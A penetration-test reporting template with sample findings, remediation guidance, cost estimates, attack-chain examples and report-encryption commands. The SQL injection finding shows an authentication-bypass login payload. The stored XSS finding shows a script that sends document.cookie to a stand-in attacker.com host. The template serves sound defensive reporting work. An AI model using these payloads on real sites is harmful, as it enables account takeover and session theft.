Reporting

EXECUTIVE SUMMARY

Engagement Overview
-------------------
[Company Name] engaged [Tester/Firm] to conduct a web application 
penetration test of [Application Name] from [Start Date] to [End Date].

Scope
-----
The assessment covered:
- Primary web application: https://app.example.com
- API endpoints: https://api.example.com
- Authentication systems
- [Other scope items]

Key Findings
------------
The assessment identified [X] vulnerabilities:
- Critical: [X]
- High: [X]  
- Medium: [X]
- Low: [X]
- Informational: [X]

Notable findings include:
1. [Critical Finding 1] - Risk of [impact]
2. [High Finding 2] - Risk of [impact]
3. [High Finding 3] - Risk of [impact]

Overall Risk Rating: [HIGH/MEDIUM/LOW]

Recommendations
---------------
Immediate actions required:
1. [Action 1]
2. [Action 2]
3. [Action 3]

Conclusion
----------
[Brief statement on overall security posture and urgency of remediation]

METHODOLOGY

Testing Approach
----------------
This assessment was conducted as a [black-box/gray-box/white-box] 
penetration test, following industry-standard methodologies including:
- OWASP Testing Guide v4.2
- PTES (Penetration Testing Execution Standard)
- NIST SP 800-115

Phases
------
1. Reconnaissance
   - Passive information gathering
   - DNS enumeration
   - Technology fingerprinting

2. Scanning
   - Port scanning
   - Service enumeration
   - Vulnerability scanning

3. Exploitation
   - Manual vulnerability verification
   - Proof-of-concept development
   - Impact assessment

4. Post-Exploitation
   - Privilege escalation attempts
   - Data access verification
   - Lateral movement assessment

Tools Used
----------
- Burp Suite Professional
- Nmap
- SQLMap
- Nuclei
- [Other tools]

Limitations
-----------
- Testing was conducted during business hours only
- Denial of Service testing was excluded
- [Other limitations]

FINDING: SQL Injection in Login Form
=====================================

Severity: CRITICAL
CVSS Score: 9.8 (Critical)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Affected Component
------------------
URL: https://app.example.com/login
Parameter: username
Method: POST

Description
-----------
A SQL injection vulnerability was identified in the login form's 
username parameter. An attacker can inject arbitrary SQL commands 
to bypass authentication, extract database contents, or potentially 
execute system commands.

Technical Details
-----------------
The following payload was used to confirm the vulnerability:

Request:
POST /login HTTP/1.1
Host: app.example.com
Content-Type: application/x-www-form-urlencoded

username=admin'--&password=anything

Response:
HTTP/1.1 302 Found
Location: /dashboard
Set-Cookie: session=eyJ1c2VyIjoiYWRtaW4ifQ==

The application accepted the malicious input without sanitization,
resulting in successful authentication bypass.

Impact
------
- Complete authentication bypass
- Full database access (demonstrated extraction of user credentials)
- Potential server-side command execution
- Complete compromise of application and user data

Evidence
--------
[Screenshot: admin_dashboard_access.png]
[Request/Response: sqli_poc.txt]

Remediation
-----------
1. Implement parameterized queries (prepared statements)
2. Use an ORM with built-in SQL injection protection
3. Apply input validation and sanitization
4. Implement Web Application Firewall rules

Code Example (Before/After):

VULNERABLE:
$query = "SELECT * FROM users WHERE username = '" + username + "'";

SECURE:
$stmt = $pdo->prepare("SELECT * FROM users WHERE username = ?");
$stmt->execute([$username]);

References
----------
- OWASP SQL Injection: https://owasp.org/www-community/attacks/SQL_Injection
- CWE-89: https://cwe.mitre.org/data/definitions/89.html

REMEDIATION PRIORITIES

Immediate (24-48 hours)
-----------------------
[ ] Finding #1: SQL Injection in Login - Implement prepared statements
[ ] Finding #2: Exposed Admin Panel - Restrict access by IP/VPN

Short-term (1-2 weeks)
----------------------
[ ] Finding #3: XSS in Search - Implement output encoding
[ ] Finding #4: Missing CSRF Tokens - Add tokens to all forms
[ ] Finding #5: Weak Password Policy - Enforce complexity requirements

Medium-term (1-3 months)
------------------------
[ ] Finding #6: Outdated Libraries - Update all dependencies
[ ] Finding #7: Missing Security Headers - Configure CSP, HSTS
[ ] Finding #8: Verbose Error Messages - Implement generic errors

Long-term (3-6 months)
----------------------
[ ] Implement WAF
[ ] Security code review process
[ ] Developer security training
[ ] Regular penetration testing schedule

REPORT DELIVERY CHECKLIST

Before Delivery
---------------
[ ] Spell check and grammar review
[ ] Technical accuracy verification
[ ] Screenshot quality check
[ ] CVSS scores validated
[ ] Sensitive data redacted appropriately
[ ] PDF generated with restricted permissions

Secure Transmission
-------------------
[ ] Encrypt report (GPG/PGP or password-protected PDF)
[ ] Use secure file transfer (encrypted portal, SFTP)
[ ] Send password via separate channel
[ ] Confirm recipient authorized to receive

After Delivery
--------------
[ ] Schedule findings walkthrough meeting
[ ] Offer Q&A session with technical team
[ ] Discuss remediation priorities
[ ] Set retest date if applicable
[ ] Archive engagement files securely

FINDING: Stored Cross-Site Scripting in User Comments
=====================================================

Severity: HIGH
CVSS Score: 8.0
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N

Affected Component
------------------
URL: https://app.example.com/posts/[id]/comments
Parameter: comment_body (POST)

Description
-----------
User-submitted comments are stored in the database and rendered 
without proper output encoding, allowing attackers to inject 
malicious JavaScript that executes in other users' browsers.

Technical Details
-----------------
Payload submitted:
<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>

When another user views the page containing this comment, the 
script executes and sends their session cookie to the attacker.

Impact
------
- Session hijacking of any user viewing the malicious comment
- Account takeover
- Malware distribution
- Defacement

Evidence
--------
[Screenshot: xss_payload_stored.png]
[Screenshot: cookie_received_attacker_server.png]

Remediation
-----------
1. Implement output encoding for all user-generated content
2. Use Content Security Policy (CSP) headers
3. Set HttpOnly flag on session cookies
4. Consider using a HTML sanitization library

Example Fix:
// Instead of:
element.innerHTML = userComment;

// Use:
element.textContent = userComment;
// Or with HTML allowed:
element.innerHTML = DOMPurify.sanitize(userComment);

FINANCIAL IMPACT ESTIMATION FRAMEWORK
=====================================

1. DATA BREACH COST (per IBM Cost of a Data Breach Report 2024)
   Average cost per record: $165 (varies by industry)
   Healthcare: $408/record | Financial: $309/record | Tech: $174/record
   
   Example: SQL injection exposing 50,000 user records
   Estimated cost: 50,000 × $165 = $8,250,000
   + Notification costs: ~$200,000
   + Legal/regulatory fines: varies (see regulatory section)
   + Brand damage: 2-5% revenue impact for 12-18 months

2. DOWNTIME/AVAILABILITY IMPACT
   Average cost of IT downtime: $5,600/minute (Gartner)
   
   Example: RCE vulnerability enabling ransomware
   24-hour outage = $5,600 × 1,440 = $8,064,000
   + Recovery costs: $500K-$5M (depending on backup maturity)

3. REGULATORY PENALTIES
   GDPR: Up to €20M or 4% of annual global revenue
   PCI-DSS: $5,000-$100,000/month until compliant
   HIPAA: $100-$50,000 per violation (max $1.5M/year/category)
   SOX: Personal liability for executives; up to $5M fine
   
4. CALCULATION TEMPLATE
   Annualized Loss Expectancy (ALE) = Single Loss Expectancy × Annual Rate of Occurrence
   SLE = Asset Value × Exposure Factor
   
   Example: Critical auth bypass
   Asset value: $10M (customer database)
   Exposure factor: 80% (full data exposure)
   SLE = $10M × 0.8 = $8M
   ARO = 0.3 (30% chance of exploitation per year)
   ALE = $8M × 0.3 = $2.4M/year

ATTACK CHAIN DOCUMENTATION TEMPLATE
====================================

Chain Title: Account Takeover via XSS + CSRF
Combined Severity: CRITICAL (individual findings: Medium + Medium = Critical chain)

Step 1: Stored XSS in User Profile (Medium - CVSS 6.1)
  → Attacker injects JavaScript payload in "About Me" field
  
Step 2: CSRF on Password Change (Medium - CVSS 6.5)
  → Password change endpoint lacks anti-CSRF token
  
Chain: XSS payload triggers CSRF password change for any user 
       who views the attacker's profile
  → Combined impact: Full account takeover of any user (Critical)

CHAIN IMPACT ASSESSMENT:
- Likelihood: HIGH (both vulns easily exploitable, no interaction beyond page view)
- Impact: CRITICAL (mass account takeover, PII exposure)
- Combined CVSS: 9.6 (vs individual 6.1 + 6.5)

ANOTHER EXAMPLE:
Information Disclosure + SSRF = Internal Network Compromise
  Step 1: Debug endpoint leaks internal IP ranges (Info - CVSS 5.3)
  Step 2: SSRF via PDF generation (High - CVSS 7.5)
  Chain: Use leaked IPs to target internal services via SSRF
  → Combined: Access to internal admin panels, databases (Critical - CVSS 9.8)

# Encrypt report PDF with GPG
gpg --output report-encrypted.pdf.gpg --encrypt --recipient client@company.com report.pdf

# Password-protect PDF with qpdf
qpdf --encrypt "STRONG_PASSWORD" "OWNER_PASSWORD" 256 -- report.pdf report-encrypted.pdf

# Generate SHA-256 hash for integrity verification
sha256sum report-encrypted.pdf > report-encrypted.pdf.sha256
# Send hash via separate channel so client can verify integrity